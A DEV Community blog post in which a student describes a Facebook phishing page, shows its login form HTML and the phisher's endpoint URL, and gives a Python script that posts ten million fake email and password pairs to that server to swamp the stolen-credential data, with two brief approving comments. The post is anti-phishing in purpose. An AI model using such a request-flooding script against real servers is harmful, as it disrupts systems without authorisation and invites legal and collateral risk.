DEV Community

loading...
Cover image for Spamming Scammers

Spamming Scammers

Michael Fatemi
Hey, I'm a student at the Thomas Jefferson High School for Science and Technology, hoping to learn the skills that will power our future 😊
・2 min read

Have you ever received a text from a friend that was unfortunately hacked on Facebook?

Phishing is where an untrustworthy website pretends to be someone they are not, in order to collect visitors' login information.

I really dislike phishers, so I decided maybe I would get revenge. Five of my friends sent me a "video" just today.

I clicked on the "video", and it took me to a fake Facebook login page. I looked into the page, and saw this HTML:


<form method="post" action="https://mortalkomb07.xyz//save.php?api=1&amp;lan=facebooknew&amp;ht=1&amp;counter0=combo1407" class="mobile-login-form _5spm" id="login_form" data-sigil="m_login_form" data-autoid="autoid_2" data-countryinsert="true">
    ...
    <input name="pass" type="password">
    <input name="username" type="text">
    ...
</form>

Enter fullscreen mode Exit fullscreen mode

I decided I would replicate fake requests, and hopefully overwhelm them with false data, at least delaying them from attacking other, real, accounts.

I loaded some fake usernames, passwords, and country data (that was also included in the form.)

Setup

First, we import some libraries.

Then, we load some fake data.

import requests
import random
import string
import json

url = 'https://mortalkomb07.xyz//save.php?api=1&lan=facebooknew&ht=1&counter0=combo1407'
chrome_user_agent = 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36'

firstnames = json.load(open("firstnames.json"))
surnames = json.load(open("surnames.json"))
countries_and_states = json.load(open("countries_and_states.json"))['countries']

email_domains = ['yahoo.com', 'gmail.com', 'hotmail.com', 'verizon.net']

letters = string.ascii_lowercase
numbers = string.digits

password_chars = string.ascii_letters + string.digits

coinflip = lambda: bool(random.randint(0, 1))

Enter fullscreen mode Exit fullscreen mode

The Loop

Now, we loop 10,000,000 times.

Each time, an email gets generated based on random names and surnames.

A country and state are chosen randomly.

A password is generated as a string of random characters.

Finally, a request is sent to their server.


for x in range(10000000):
    email = ''
    # first name
    email += random.choice(firstnames).lower()

    # add a surname
    if coinflip():
        email += "." if coinflip() else ""
        email += random.choice(surnames).lower()

    if coinflip():
        email += str(random.randint(0, 100))

    email += "@" + random.choice(email_domains)

    password = ''
    for y in range(random.randint(8, 20)):
        password += random.choice(password_chars)

    country_and_states = random.choice(countries_and_states)
    while len(country_and_states['states']) == 0:
        country_and_states = random.choice(countries_and_states)

    country = country_and_states['country']
    state = random.choice(country_and_states['states'])

    # send the request

    requests.post(url, {
        "ua": "",
        "email": email,
        "pass": password,
        "pais": country,
        "Country": country,
        "country": country,
        "state": state
    }, headers={
        "User-Agent": chrome_user_agent
    }, allow_redirects=False)

    print("sent", x + 1, "fake emails and passwords")
Enter fullscreen mode Exit fullscreen mode

Later, the output is:

image

This was a fun exercise, and hopefully the scammers get held back.

Discussion (2)

Collapse
hyperionlegion profile image
Joshua Hsueh

wow this was a very cool exercise

Collapse
myfatemi04 profile image
Michael Fatemi Author

Thank you Joshua